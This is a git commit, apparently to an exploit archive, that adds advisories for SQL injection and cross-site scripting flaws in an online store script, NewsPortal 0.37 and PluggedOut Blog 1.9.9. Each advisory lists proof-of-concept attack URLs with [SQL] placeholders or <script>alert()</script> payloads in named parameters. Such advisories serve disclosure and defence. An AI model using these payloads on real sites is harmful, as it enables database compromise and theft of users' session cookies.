Updated 12_08_2014
This commit is contained in:
parent
3672d19ffa
commit
35d1967763
4 changed files with 43 additions and 0 deletions
|
@ -31954,3 +31954,6 @@ id,file,description,date,author,platform,type,port
|
||||||
35477,platforms/php/webapps/35477.txt,"XOOPS 2.x Multiple Cross Site Scripting Vulnerabilities",2011-03-18,"Aung Khant",php,webapps,0
|
35477,platforms/php/webapps/35477.txt,"XOOPS 2.x Multiple Cross Site Scripting Vulnerabilities",2011-03-18,"Aung Khant",php,webapps,0
|
||||||
35478,platforms/linux/dos/35478.txt,"MHonArc 2.6.16 Tag Nesting Remote Denial of Service Vulnerability",2010-12-21,anonymous,linux,dos,0
|
35478,platforms/linux/dos/35478.txt,"MHonArc 2.6.16 Tag Nesting Remote Denial of Service Vulnerability",2010-12-21,anonymous,linux,dos,0
|
||||||
35479,platforms/php/webapps/35479.txt,"Web Poll Pro 1.0.3 'error' Parameter HTML Injection Vulnerability",2011-03-19,Hector.x90,php,webapps,0
|
35479,platforms/php/webapps/35479.txt,"Web Poll Pro 1.0.3 'error' Parameter HTML Injection Vulnerability",2011-03-19,Hector.x90,php,webapps,0
|
||||||
|
35480,platforms/php/webapps/35480.txt,"Online store php script Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-21,"kurdish hackers team",php,webapps,0
|
||||||
|
35481,platforms/php/webapps/35481.txt,"NewsPortal 0.37 'post.php' Cross Site Scripting Vulnerability",2011-03-21,"kurdish hackers team",php,webapps,0
|
||||||
|
35482,platforms/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 'year' Parameter Cross Site Scripting Vulnerability",2011-03-21,"kurdish hackers team",php,webapps,0
|
||||||
|
|
Can't render this file because it is too large.
|
22
platforms/php/webapps/35480.txt
Executable file
22
platforms/php/webapps/35480.txt
Executable file
|
@ -0,0 +1,22 @@
|
||||||
|
source: http://www.securityfocus.com/bid/46960/info
|
||||||
|
|
||||||
|
Online store php script is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||||
|
|
||||||
|
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||||
|
|
||||||
|
SQL Injection URIs:
|
||||||
|
====================
|
||||||
|
|
||||||
|
http://www.example.com/detail.php?prodid=[SQL]
|
||||||
|
http://www.example.com/view_wishlist.php?products_id=[SQL]
|
||||||
|
http://www.example.com/moreImage.php?prod_id=[SQL]
|
||||||
|
http://www.example.com/product2.php?loginn=confirmed&a=&b=&submit=+++Login+++.... [empty Query ]
|
||||||
|
http://www.example.com/products.php?cid=21&sid=558&skip=[SQL]
|
||||||
|
http://www.example.com/gstatus.php?code=[SQL]
|
||||||
|
|
||||||
|
Cross Site Scripting URIs:
|
||||||
|
==========================
|
||||||
|
|
||||||
|
http://www.example.com/detail.php?prodid=<script>alert(1)</script>
|
||||||
|
http://www.example.com/products.php?cid=21&sid=558&skip=<script>alert(1)</script>
|
||||||
|
|
9
platforms/php/webapps/35481.txt
Executable file
9
platforms/php/webapps/35481.txt
Executable file
|
@ -0,0 +1,9 @@
|
||||||
|
source: http://www.securityfocus.com/bid/46961/info
|
||||||
|
|
||||||
|
NewsPortal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||||
|
|
||||||
|
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||||
|
|
||||||
|
NewsPortal 0.37 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/post.php?newsgroups=<script>alert(28)</script>
|
9
platforms/php/webapps/35482.txt
Executable file
9
platforms/php/webapps/35482.txt
Executable file
|
@ -0,0 +1,9 @@
|
||||||
|
source: http://www.securityfocus.com/bid/46962/info
|
||||||
|
|
||||||
|
PluggedOut Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||||
|
|
||||||
|
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||||
|
|
||||||
|
PluggedOut Blog 1.9.9 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/index.php?year=<script>alert(88888)</script>
|
Loading…
Add table
Reference in a new issue